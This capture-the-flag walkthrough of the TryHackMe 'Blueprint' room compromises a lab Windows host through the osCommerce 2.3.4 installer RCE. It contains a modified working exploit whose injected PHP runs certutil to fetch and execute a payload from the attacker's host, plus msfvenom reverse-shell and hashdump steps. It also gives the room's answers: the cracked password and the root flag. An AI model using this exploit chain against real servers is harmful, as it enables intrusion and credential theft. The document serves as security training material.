In this walkthrough we will go through the Blueprint room from Tryhackme. The room is rated Easy on the platform, and the objective is to hack into this Windows machine and escalate our privileges to Administrator to capture the root flag. So, let's get started without any delay.
Machine Info:

| Field | Value |
|---|---|
| Title | Blueprint |
| IP address | 10.10.209.244 |
| Difficulty | Easy |
| Objective | Hack into this Windows machine and escalate your privileges to Administrator. |
Enumeration:
- I started off with a regular nmap SYN scan with service version detection and, as expected for a Windows host, found many open ports. The interesting ones were 80, 8080 and 443 (HTTP/HTTPS), 139 and 445 (SMB) and 3306 (MySQL).
sudo nmap -sS -sV 10.10.209.244
- Enumerated the web server running on port 80 and found a 404 error there.
- Next, I pivoted to port 443, which has directory listing enabled; the listing revealed that osCommerce 2.3.4 is installed on the server.
- The same installation is reachable on port 8080.
- Next, I moved on to SMB enumeration and found a couple of shares, but smbmap showed we had no access to any of them.
smbclient -L 10.10.209.244
smbmap -H 10.10.209.244
- Fired gobuster at the osCommerce installation and found a bunch of interesting directories, the leftover /install directory among them.

```
wh1terose@fsociety:~$ gobuster dir -u http://10.10.209.244:8080/oscommerce-2.3.4/catalog/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.209.244:8080/oscommerce-2.3.4/catalog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/29 12:41:49 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 1046]
/.hta                 (Status: 403) [Size: 1046]
/.htpasswd            (Status: 403) [Size: 1046]
/ADMIN                (Status: 301) [Size: 371] [-->
/Admin                (Status: 301) [Size: 371] [-->
/Images
/admin
/download
/ext
/images
/install              (Status: 301) [Size: 373] [-->
/pub                  (Status: 301) [Size: 369] [-->
-- snipped --
===============================================================
2023/11/29 12:44:14 Finished
===============================================================
```
- Next, searched for known exploits against that osCommerce version with searchsploit and found an RCE exploit that abuses the installer left behind in /install (EDB-ID 44374).
searchsploit oscommerce 2.3.4
Initial Access:
- Copied the exploit to my working directory.
searchsploit -m php/webapps/44374.py
- Changed the target and base URLs in the exploit and executed it. However, the PHP system() function that the exploit's default payload relies on was disabled on the server for security reasons, so no command output came back.
python 44374.py
- So I generated a Windows Meterpreter payload named shell.exe with msfvenom. The idea is to swap the blocked system() call for shell_exec(), have certutil download the payload straight onto the server from my machine, and run it when the injected configure.php is requested, so that a shell comes back to my handler.

```
wh1terose@fsociety:~/CTF/TryHackme/Blueprint$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe
Running the 'init' command for the database:
Existing database found, attempting to start it
Starting database at /home/wh1terose/.msf4/db...pg_ctl: another server might be running; trying to start server anyway
server starting
success
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
```
- Made the following changes to the exploit so it delivers the new payload (the certutil download and execution replaces the original system() call):

```python
import requests

# enter the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
payload = '\');'
# this is where you enter your PHP payload: download shell.exe with certutil, then run it
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.18.1.78:8000/shell.exe shell.exe & shell.exe");'
payload += 'echo $var;'
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")
```
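To make the injection concrete, here is an added example (not part of the original post and not part of the EDB exploit) that simulates, in Python, the PHP concatenation quoted in the exploit's comment: it renders the configure.php line the installer writes for a given DB_DATABASE value, shows which bytes become executable PHP when the value has the `'); PAYLOAD; /*` shape, and puts a hardened variant beside it that only accepts an identifier-style database name. The PHP_TEMPLATE string and all function names are assumptions for illustration; the stager string is the one from the modified exploit above.

```python
import re
from typing import Optional

# Assumption for illustration: the installer's PHP, reproduced from the comment in the
# exploit above, concatenates the trimmed POST value straight into PHP source:
#   ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n"
PHP_TEMPLATE = "  define('DB_DATABASE', '{value}');\n"

# Identifier-style names only; quotes, parentheses, semicolons and slashes are rejected.
SAFE_DB_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")


def render_db_define(db_database: str) -> str:
    """Vulnerable behaviour: trim and concatenate with no escaping (mirrors the installer)."""
    return PHP_TEMPLATE.format(value=db_database.strip())


def render_db_define_hardened(db_database: str) -> Optional[str]:
    """Hardened variant: refuse to write anything but a plain identifier into configure.php."""
    value = db_database.strip()
    if not SAFE_DB_NAME.fullmatch(value):
        return None
    return PHP_TEMPLATE.format(value=value)


def build_payload(php_code: str) -> str:
    """Same shape the exploit uses: close the string literal and the define() call,
    append php_code, then open a comment so the rest of the generated line is ignored."""
    return "');" + php_code + "/*"


def injected_php_code(rendered_line: str) -> Optional[str]:
    """Return the PHP statements that would execute from a rendered line, or None when
    the line is a plain define() with no breakout."""
    m = re.search(r"define\('DB_DATABASE', ''\);(.*?)/\*", rendered_line, re.S)
    return m.group(1) if m else None


# Stager from the modified exploit above: fetch shell.exe with certutil, then run it.
STAGER = ('$var = shell_exec("cmd.exe /C certutil -urlcache -split -f '
          'http://10.18.1.78:8000/shell.exe shell.exe & shell.exe");echo $var;')

if __name__ == "__main__":
    print("benign value   :", render_db_define("oscommerce"), end="")
    rendered = render_db_define(build_payload(STAGER))
    print("injected value :", rendered, end="")
    print("code that runs :", injected_php_code(rendered))
    print("hardened       :", render_db_define_hardened(build_payload(STAGER)))
```

The rendered line shows why the exploit works: the installer produces `define('DB_DATABASE', '');` followed immediately by the attacker's statements and a `/*`, and configure.php is later included as ordinary PHP. The hardened function returns None for the same input, which is the check the installer should have performed before writing user input into source code.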
- I spun up a web server on port 8000 serving shell.exe and ran the modified exploit. As soon as I requested the configure.php file, the stager fetched and launched the payload and I received a connection back at my Metasploit multi/handler running as NT AUTHORITY\SYSTEM, so no privilege escalation was needed.

```
wh1terose@fsociety:~$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.18.1.78
LHOST => 10.18.1.78
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.18.1.78:4444
[*] Sending stage (175686 bytes) to 10.10.209.244
[*] Meterpreter session 1 opened (10.18.1.78:4444 -> 10.10.209.244:49477) at 2023-11-29 13:29:53 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
Getting Flags:
- As per the flag requirement, I dumped the local account hashes with hashdump (possible because the session runs as SYSTEM) and cracked the NT hash of the "Lab" user on CrackStation, which gave the password googleplus. Note that these are unsalted MD4 hashes of the UTF-16LE password, so they are cracked by lookup or brute force rather than "decrypted"; the identical LM field aad3b435b51404eeaad3b435b51404ee on every line is the empty LM hash, meaning LM hashing is disabled, and the Guest NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password.

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
```
- Finally, read the root flag and completed the room.
Task 1 – Blueprint
Question 1 – “Lab” user NTLM hash decrypted
googleplus
Question 2 – root.txt
THM{aea1e3ce6fe7f89e10cea833ae009bee}
Conclusion:
So that was "Blueprint" for you. We started with an nmap scan with the service version detection flag set and found many open ports: 80, 8080 and 443 (HTTP/HTTPS), 139 and 445 (SMB) and 3306 (MySQL). Next, we enumerated the web servers on ports 80, 443 and 8080 and found an osCommerce 2.3.4 installation. We looked for known exploits for that version and found an RCE in the installer it had left behind. We then generated a Meterpreter payload with msfvenom and used the exploit to download and execute it on the server, which gave us a shell back at our handler running as NT AUTHORITY\SYSTEM. Finally, we dumped and cracked the hashes and captured the root flag to complete the room, on what was also my first night after marriage. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".